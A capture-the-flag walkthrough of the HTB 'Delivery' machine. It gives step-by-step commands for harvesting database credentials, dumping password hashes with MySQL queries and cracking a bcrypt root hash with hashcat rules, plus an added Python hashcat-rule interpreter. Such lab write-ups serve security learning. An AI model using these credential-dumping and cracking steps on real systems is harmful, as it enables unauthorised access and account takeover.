This is a write-up on the Delivery machine challenge from HTB. For more information on challenges like these, check out my post on penetration testing. Special thanks to HTB user ippsec for creating the challenge.
Getting On The Server
A basic nmap scan shows the machine is running SSH and hosting a web server. Visit the website, which contains links to http://helpdesk.delivery.htb/ and http://delivery.htb:8065, and add the host names to /etc/hosts.
echo "10.10.10.222 helpdesk.delivery.htb delivery.htb" >> /etc/hosts
- Open a support ticket, keeping track of the ticket number. Also note the email address that is provided when the ticket is created: "If you want to add more information to your ticket, just email [email protected]"
- Create an account on the mattermost server, using the email address provided when creating a support ticket (e.g. [email protected]).
- Check on the status of the support ticket. There will now be a message containing a validation link.
- Open the validation link and log into mattermost, then join the "Internal" team. Read all the messages, as they provide clues required later for privilege escalation.
- One of the messages posted includes the username and password for the server. Use these credentials to SSH to the server and obtain user.txt.
Based on the clues provided, look for hashes that can be used to crack the root password. The file /opt/mattermost/config/config.json contains credentials for the mattermost database and is a good place to start.
mysql -u mmuser -p #enter password when prompted
show databases; #determine which database to connect to
use mattermost; #connect to database
show tables; #reconnaissance / find relevant information
select * from Users; #displays information about users, including password hashes
select Password from Users where Username = 'root'; #narrow the search
The steps above can be used to obtain a password hash for root. To crack the hash, the type of hash must be known. This can be determined with the hashid command.
hashid '$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO' #bcrypt/Blowfish
Next, recall the clue on the mattermost server: "PleaseSubscribe! may not be in RockYou but if any hacker manages to get our hashes, they can use hashcat rules to easily crack all variations of common words or phrases." The hashcat command can generate a list of password variations of PleaseSubscribe!, which can then serve as the wordlist for cracking the hash. Create a text file called mangleme with one line of text reading "PleaseSubscribe!" (without the quotes). Ensure the file contains no extraneous whitespace, since hashcat treats a trailing space as part of the word and every candidate would inherit it.
Run hashcat to create the wordlist, then run it again to reverse the hash.
hashcat -r /usr/share/hashcat/rules/best64.rule --stdout mangleme > wordlist.txt
hashcat -m 3200 '$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO' wordlist.txt
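To see what the rule step actually does, here is an added example (not code from the write-up) that interprets a small constructed subset of hashcat's rule functions in Python and expands PleaseSubscribe! the way --stdout would; the RULES list is constructed for illustration and is not the contents of best64.rule. The same expansion doubles as a defensive check that a chosen password is not merely a mangled form of a known phrase.

```python
# Added example (not from the write-up): a minimal interpreter for a subset of
# hashcat's rule syntax, used to expand one seed and as a password policy check.

# Constructed rule lines in hashcat syntax: a small subset of the functions
# best64.rule uses, not that file's actual contents.
RULES = [":", "l", "u", "c", "r", "d", "t", "]", "$1", "$1 $2 $3", "^1",
         "se3", "sa@", "T0"]

SIMPLE = {                                         # argument-less functions
    ":": lambda w: w,                              # no-op
    "l": str.lower, "u": str.upper,                # lowercase / uppercase
    "c": lambda w: w[:1].upper() + w[1:].lower(),  # capitalise
    "r": lambda w: w[::-1],                        # reverse
    "d": lambda w: w * 2,                          # duplicate
    "t": str.swapcase,                             # toggle every character
    "]": lambda w: w[:-1],                         # delete last character
}

def apply_rule(word, rule):
    """Apply one rule line (space-separated functions, left to right)."""
    i = 0
    while i < len(rule):
        f = rule[i]
        if f == " ":
            i += 1
        elif f in SIMPLE:
            word, i = SIMPLE[f](word), i + 1
        elif f == "$":                             # $X: append X
            word, i = word + rule[i + 1], i + 2
        elif f == "^":                             # ^X: prepend X
            word, i = rule[i + 1] + word, i + 2
        elif f == "s":                             # sXY: replace all X with Y
            word, i = word.replace(rule[i + 1], rule[i + 2]), i + 3
        elif f == "T":                             # TN: toggle case at index N
            n = int(rule[i + 1], 36)
            if n < len(word):
                word = word[:n] + word[n].swapcase() + word[n + 1:]
            i += 2
        else:
            raise ValueError(f"unsupported rule function {f!r}")
    return word

def expand(seed, rules=RULES):
    """Deduplicated candidates, in the order hashcat --stdout emits them."""
    return list(dict.fromkeys(apply_rule(seed, r) for r in rules))

def derived_from(seed, password, rules=RULES):
    """Policy check: is `password` a rule-mangled form of `seed`?"""
    return password in expand(seed, rules)
```

Running expand("PleaseSubscribe!") yields 14 distinct candidates from a single seed, which is the point of the clue: a phrase with digits or symbol substitutions bolted on is still one rule away from its base word.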
The password for root is revealed and can be used with the su command to elevate to the root account and obtain root.txt.